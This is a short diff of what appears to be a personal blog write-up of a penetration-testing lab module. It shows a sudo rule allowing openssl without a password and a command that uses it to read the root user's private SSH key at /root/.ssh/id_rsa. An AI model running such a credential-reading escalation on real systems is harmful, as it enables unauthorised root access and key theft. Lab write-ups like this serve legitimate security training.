kchen4028/kchen4028.github.io/_posts/2025-03-14-AEN-Module.md

 User srvadm may run the following commands on dmz01:
     (ALL) NOPASSWD: /usr/bin/openssl
 ```
 Since we have sudo command on /usr/bin/openssl, we will check GTFOBINS for an exploit.
 There is a sudo exploit on GTFOBINS, but it did not work in getting me root access.
-I checked Yerald's video and see that he has two commands to get root:
+I used the below command to display the id_rsa file in the root folder using openssl with root privilege.
 ```
 LFILE=/root/.ssh/id_rsa
 sudo /usr/bin/openssl enc -in $LFILE